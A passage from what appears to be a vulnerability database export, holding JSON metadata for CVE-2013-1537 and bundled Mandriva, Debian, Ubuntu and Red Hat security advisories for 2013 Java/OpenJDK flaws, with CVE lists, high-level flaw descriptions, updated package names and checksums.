"https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.5-0ubuntu0.10.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2436" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.5-0ubuntu0.11.10.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1558" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1819-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.5-0ubuntu0.12.04.1" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2431" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2426" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2421" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1569" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2420" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1488" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1518" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2419" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2384" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2417" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0401" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2429" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1557" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2383" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1537" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2415" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2424" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2430" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2422" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "BID", "id": "59194" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "121631" }, { "db": "PACKETSTORM", "id": "121703" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "121555" }, { "db": "PACKETSTORM", "id": "121361" }, { "db": "CNNVD", "id": "CNNVD-201304-359" }, { "db": "NVD", "id": "CVE-2013-1537" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "BID", "id": "59194" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "121631" }, { "db": "PACKETSTORM", "id": "121703" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "121555" }, { "db": "PACKETSTORM", "id": "121361" }, { "db": "CNNVD", "id": "CNNVD-201304-359" }, { "db": "NVD", "id": "CVE-2013-1537" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-04-17T00:00:00", "db": "VULMON", "id": "CVE-2013-1537" }, { "date": "2013-04-16T00:00:00", "db": "BID", "id": "59194" }, { "date": "2013-10-23T22:57:57", "db": "PACKETSTORM", "id": "123734" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2013-05-14T20:49:34", "db": "PACKETSTORM", "id": "121631" }, { "date": "2013-05-23T00:42:44", "db": "PACKETSTORM", "id": "121703" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2013-05-07T20:22:00", "db": "PACKETSTORM", "id": "121555" }, { "date": "2013-04-19T19:11:00", "db": "PACKETSTORM", "id": "121361" }, { "date": "2013-04-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201304-359" }, { "date": "2013-04-17T18:55:06.570000", "db": "NVD", "id": "CVE-2013-1537" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-19T00:00:00", "db": "VULMON", "id": "CVE-2013-1537" }, { "date": "2017-08-11T20:11:00", "db": "BID", "id": "59194" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201304-359" }, { "date": "2022-05-13T14:52:55.417000", "db": "NVD", "id": "CVE-2013-1537" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201304-359" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE JRE Unknown security vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201304-359" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "59194" } ], "trust": 0.3 } }
var-201306-0253
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality and availability via unknown vectors related to Libraries. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "XML security and the class loader.". The vulnerability can be exploited over multiple protocols. This issue affects the 'Libraries' sub-component. This vulnerability affects the following supported versions: 7 Update 21 , 6 Update 45. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2013:196 http://www.mandriva.com/en/support/security/
Package : java-1.6.0-openjdk Date : July 15, 2013 Affected: Enterprise Server 5.0
Problem Description:
Updated java-1.6.0-openjdk packages fix security vulnerabilities:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption (CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469).
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application (CVE-2013-2459).
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions (CVE-2013-2448, CVE-2013-2457, CVE-2013-2453).
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information (CVE-2013-2456, CVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443, CVE-2013-2446).
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine (CVE-2013-2445).
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service (CVE-2013-2444, CVE-2013-2450). A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service (CVE-2013-2407, CVE-2013-2461).
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information (CVE-2013-2412).
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation (CVE-2013-1571).
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment (CVE-2013-1500).
It was discovered that the Networking component did not properly enforce exclusive port binding. A local attacker could exploit this flaw to bind to ports intended to be exclusively bound (CVE-2013-2451).
This updates IcedTea6 to version 1.11.12, which fixes these issues, as well as several other bugs.
Additionally, this OpenJDK update causes icedtea-web, the Java browser plugin, to crash, so icedtea-web has been patched to fix this.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2449 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2451 https://rhn.redhat.com/errata/RHSA-2013-1014.html
Updated Packages:
Mandriva Enterprise Server 5: 3ae552d38d7cd10be746e4703279f789 mes5/i586/icedtea-web-1.3.2-0.4mdvmes5.2.i586.rpm cb106d5fa87dcb272347ccc6ff4c1c24 mes5/i586/icedtea-web-javadoc-1.3.2-0.4mdvmes5.2.i586.rpm 2ae9cb967329a454731c3c5c50118fb5 mes5/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm 05afab461704f00714707dd22f4811be mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm dc372b36845109db264de4d33301d9e5 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm 55cdf45405844e373f60c3bcac1c3fbc mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm 48653ecc4f9b945fafbf43e972465a18 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.6mdvmes5.2.i586.rpm 6652ab0958ffe2b11b061f8281c3e5a7 mes5/SRPMS/icedtea-web-1.3.2-0.4mdvmes5.2.src.rpm 977e2c2d131ba350b6dd15cfd1bbf14c mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 6ffbc522ac4a2db8212ac963de525576 mes5/x86_64/icedtea-web-1.3.2-0.4mdvmes5.2.x86_64.rpm 2bc2c2b9ce03a4785ef061ca66156aaa mes5/x86_64/icedtea-web-javadoc-1.3.2-0.4mdvmes5.2.x86_64.rpm 841d31717e695fd649290fd561400a4d mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm 51bd267b7c1b2efe641e080deb68fe96 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm 68fb561cd1b10758db8d9d6aa7d24487 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm 775811371aca053a714df2d570c19720 mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm 7ce118640d8e59d659b020febe513427 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.6mdvmes5.2.x86_64.rpm 6652ab0958ffe2b11b061f8281c3e5a7 mes5/SRPMS/icedtea-web-1.3.2-0.4mdvmes5.2.src.rpm 977e2c2d131ba350b6dd15cfd1bbf14c mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.6mdvmes5.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFR47+cmqjQ0CJFipgRAmnTAJ4lalit4V4VWsSE6KHeem9qtHb+9gCgmJ/U GUelRnMi6Rq7d9NhnTCwrlg= =rErU -----END PGP SIGNATURE----- .
For the stable distribution (wheezy), these problems have been fixed in version 7u25-2.3.10-1~deb7u1. In addition icedtea-web needed to be updated to 1.4-3~deb7u1.
For the unstable distribution (sid), these problems have been fixed in version 7u25-2.3.10-1. ============================================================================ Ubuntu Security Notice USN-1907-1 July 16, 2013
openjdk-7 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 13.04
- Ubuntu 12.10
Summary:
Several security issues were fixed in OpenJDK 7. (CVE-2013-1500, CVE-2013-2454, CVE-2013-2458)
A vulnerability was discovered in the OpenJDK Javadoc related to data integrity. (CVE-2013-1571)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and availability. (CVE-2013-2412, CVE-2013-2443, CVE-2013-2446, CVE-2013-2447, CVE-2013-2449, CVE-2013-2452, CVE-2013-2456)
Several vulnerabilities were discovered in the OpenJDK JRE related to availability. (CVE-2013-2448, CVE-2013-2451, CVE-2013-2459, CVE-2013-2460, CVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473)
Several vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-2453, CVE-2013-2455, CVE-2013-2457)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 13.04: icedtea-7-jre-jamvm 7u25-2.3.10-1ubuntu0.13.04.2 openjdk-7-doc 7u25-2.3.10-1ubuntu0.13.04.2 openjdk-7-jre 7u25-2.3.10-1ubuntu0.13.04.2 openjdk-7-jre-headless 7u25-2.3.10-1ubuntu0.13.04.2 openjdk-7-jre-lib 7u25-2.3.10-1ubuntu0.13.04.2 openjdk-7-jre-zero 7u25-2.3.10-1ubuntu0.13.04.2
Ubuntu 12.10: icedtea-7-jre-cacao 7u25-2.3.10-1ubuntu0.12.10.2 icedtea-7-jre-jamvm 7u25-2.3.10-1ubuntu0.12.10.2 openjdk-7-doc 7u25-2.3.10-1ubuntu0.12.10.2 openjdk-7-jre 7u25-2.3.10-1ubuntu0.12.10.2 openjdk-7-jre-headless 7u25-2.3.10-1ubuntu0.12.10.2 openjdk-7-jre-lib 7u25-2.3.10-1ubuntu0.12.10.2 openjdk-7-jre-zero 7u25-2.3.10-1ubuntu0.12.10.2
This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now available for Red Hat Network Satellite Server 5.5.
The Red Hat Security Response Team has rated this update as having low security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Satellite 5.5 (RHEL v.5) - s390x, x86_64 Red Hat Satellite 5.5 (RHEL v.6) - s390x, x86_64
- Description:
This update corrects several security vulnerabilities in the IBM Java Runtime Environment shipped as part of Red Hat Network Satellite Server 5.5. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. (CVE-2012-0547, CVE-2012-0551, CVE-2012-1531, CVE-2012-1532, CVE-2012-1533, CVE-2012-1541, CVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717, CVE-2012-1718, CVE-2012-1719, CVE-2012-1721, CVE-2012-1722, CVE-2012-1725, CVE-2012-3143, CVE-2012-3159, CVE-2012-3213, CVE-2012-3216, CVE-2012-3342, CVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068, CVE-2012-5069, CVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089, CVE-2013-0169, CVE-2013-0351, CVE-2013-0401, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487, CVE-2013-1491, CVE-2013-1493, CVE-2013-1500, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-1571, CVE-2013-2383, CVE-2013-2384, CVE-2013-2394, CVE-2013-2407, CVE-2013-2412, CVE-2013-2417, CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424, CVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435, CVE-2013-2437, CVE-2013-2440, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444, CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465, CVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473, CVE-2013-3743)
Users of Red Hat Network Satellite Server 5.5 are advised to upgrade to these updated packages, which contain the IBM Java SE 6 SR14 release. For this update to take effect, Red Hat Network Satellite Server must be restarted ("/usr/sbin/rhn-satellite restart"), as well as all running instances of IBM Java.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
829358 - CVE-2012-1717 OpenJDK: insecure temporary file permissions (JRE, 7143606)
829360 - CVE-2012-1716 OpenJDK: SynthLookAndFeel application context bypass (Swing, 7143614)
829361 - CVE-2012-1713 OpenJDK: fontmanager layout lookup code memory corruption (2D, 7143617)
829371 - CVE-2012-1719 OpenJDK: mutable repository identifiers in generated stub code (CORBA, 7143851)
829372 - CVE-2012-1718 OpenJDK: CRL and certificate extensions handling improvements (Security, 7143872)
829376 - CVE-2012-1725 OpenJDK: insufficient invokespecial
- Package List:
Red Hat Satellite 5.5 (RHEL v.5):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.src.rpm
s390x: java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm
x86_64: java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm
Red Hat Satellite 5.5 (RHEL v.6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.src.rpm
s390x: java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm
x86_64: java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2012-0547.html https://www.redhat.com/security/data/cve/CVE-2012-0551.html https://www.redhat.com/security/data/cve/CVE-2012-1531.html https://www.redhat.com/security/data/cve/CVE-2012-1532.html https://www.redhat.com/security/data/cve/CVE-2012-1533.html https://www.redhat.com/security/data/cve/CVE-2012-1541.html https://www.redhat.com/security/data/cve/CVE-2012-1682.html https://www.redhat.com/security/data/cve/CVE-2012-1713.html https://www.redhat.com/security/data/cve/CVE-2012-1716.html https://www.redhat.com/security/data/cve/CVE-2012-1717.html https://www.redhat.com/security/data/cve/CVE-2012-1718.html https://www.redhat.com/security/data/cve/CVE-2012-1719.html https://www.redhat.com/security/data/cve/CVE-2012-1721.html https://www.redhat.com/security/data/cve/CVE-2012-1722.html https://www.redhat.com/security/data/cve/CVE-2012-1725.html https://www.redhat.com/security/data/cve/CVE-2012-3143.html https://www.redhat.com/security/data/cve/CVE-2012-3159.html https://www.redhat.com/security/data/cve/CVE-2012-3213.html https://www.redhat.com/security/data/cve/CVE-2012-3216.html https://www.redhat.com/security/data/cve/CVE-2012-3342.html https://www.redhat.com/security/data/cve/CVE-2012-4820.html https://www.redhat.com/security/data/cve/CVE-2012-4822.html https://www.redhat.com/security/data/cve/CVE-2012-4823.html https://www.redhat.com/security/data/cve/CVE-2012-5068.html https://www.redhat.com/security/data/cve/CVE-2012-5069.html https://www.redhat.com/security/data/cve/CVE-2012-5071.html https://www.redhat.com/security/data/cve/CVE-2012-5072.html https://www.redhat.com/security/data/cve/CVE-2012-5073.html https://www.redhat.com/security/data/cve/CVE-2012-5075.html https://www.redhat.com/security/data/cve/CVE-2012-5079.html https://www.redhat.com/security/data/cve/CVE-2012-5081.html https://www.redhat.com/security/data/cve/CVE-2012-5083.html https://www.redhat.com/security/data/cve/CVE-2012-5084.html https://www.redhat.com/security/data/cve/CVE-2012-5089.html https://www.redhat.com/security/data/cve/CVE-2013-0169.html https://www.redhat.com/security/data/cve/CVE-2013-0351.html https://www.redhat.com/security/data/cve/CVE-2013-0401.html https://www.redhat.com/security/data/cve/CVE-2013-0409.html https://www.redhat.com/security/data/cve/CVE-2013-0419.html https://www.redhat.com/security/data/cve/CVE-2013-0423.html https://www.redhat.com/security/data/cve/CVE-2013-0424.html https://www.redhat.com/security/data/cve/CVE-2013-0425.html https://www.redhat.com/security/data/cve/CVE-2013-0426.html https://www.redhat.com/security/data/cve/CVE-2013-0427.html https://www.redhat.com/security/data/cve/CVE-2013-0428.html https://www.redhat.com/security/data/cve/CVE-2013-0432.html https://www.redhat.com/security/data/cve/CVE-2013-0433.html https://www.redhat.com/security/data/cve/CVE-2013-0434.html https://www.redhat.com/security/data/cve/CVE-2013-0435.html https://www.redhat.com/security/data/cve/CVE-2013-0438.html https://www.redhat.com/security/data/cve/CVE-2013-0440.html https://www.redhat.com/security/data/cve/CVE-2013-0441.html https://www.redhat.com/security/data/cve/CVE-2013-0442.html https://www.redhat.com/security/data/cve/CVE-2013-0443.html https://www.redhat.com/security/data/cve/CVE-2013-0445.html https://www.redhat.com/security/data/cve/CVE-2013-0446.html https://www.redhat.com/security/data/cve/CVE-2013-0450.html https://www.redhat.com/security/data/cve/CVE-2013-0809.html https://www.redhat.com/security/data/cve/CVE-2013-1473.html https://www.redhat.com/security/data/cve/CVE-2013-1476.html https://www.redhat.com/security/data/cve/CVE-2013-1478.html https://www.redhat.com/security/data/cve/CVE-2013-1480.html https://www.redhat.com/security/data/cve/CVE-2013-1481.html https://www.redhat.com/security/data/cve/CVE-2013-1486.html https://www.redhat.com/security/data/cve/CVE-2013-1487.html https://www.redhat.com/security/data/cve/CVE-2013-1491.html https://www.redhat.com/security/data/cve/CVE-2013-1493.html https://www.redhat.com/security/data/cve/CVE-2013-1500.html https://www.redhat.com/security/data/cve/CVE-2013-1537.html https://www.redhat.com/security/data/cve/CVE-2013-1540.html https://www.redhat.com/security/data/cve/CVE-2013-1557.html https://www.redhat.com/security/data/cve/CVE-2013-1563.html https://www.redhat.com/security/data/cve/CVE-2013-1569.html https://www.redhat.com/security/data/cve/CVE-2013-1571.html https://www.redhat.com/security/data/cve/CVE-2013-2383.html https://www.redhat.com/security/data/cve/CVE-2013-2384.html https://www.redhat.com/security/data/cve/CVE-2013-2394.html https://www.redhat.com/security/data/cve/CVE-2013-2407.html https://www.redhat.com/security/data/cve/CVE-2013-2412.html https://www.redhat.com/security/data/cve/CVE-2013-2417.html https://www.redhat.com/security/data/cve/CVE-2013-2418.html https://www.redhat.com/security/data/cve/CVE-2013-2419.html https://www.redhat.com/security/data/cve/CVE-2013-2420.html https://www.redhat.com/security/data/cve/CVE-2013-2422.html https://www.redhat.com/security/data/cve/CVE-2013-2424.html https://www.redhat.com/security/data/cve/CVE-2013-2429.html https://www.redhat.com/security/data/cve/CVE-2013-2430.html https://www.redhat.com/security/data/cve/CVE-2013-2432.html https://www.redhat.com/security/data/cve/CVE-2013-2433.html https://www.redhat.com/security/data/cve/CVE-2013-2435.html https://www.redhat.com/security/data/cve/CVE-2013-2437.html https://www.redhat.com/security/data/cve/CVE-2013-2440.html https://www.redhat.com/security/data/cve/CVE-2013-2442.html https://www.redhat.com/security/data/cve/CVE-2013-2443.html https://www.redhat.com/security/data/cve/CVE-2013-2444.html https://www.redhat.com/security/data/cve/CVE-2013-2446.html https://www.redhat.com/security/data/cve/CVE-2013-2447.html https://www.redhat.com/security/data/cve/CVE-2013-2448.html https://www.redhat.com/security/data/cve/CVE-2013-2450.html https://www.redhat.com/security/data/cve/CVE-2013-2451.html https://www.redhat.com/security/data/cve/CVE-2013-2452.html https://www.redhat.com/security/data/cve/CVE-2013-2453.html https://www.redhat.com/security/data/cve/CVE-2013-2454.html 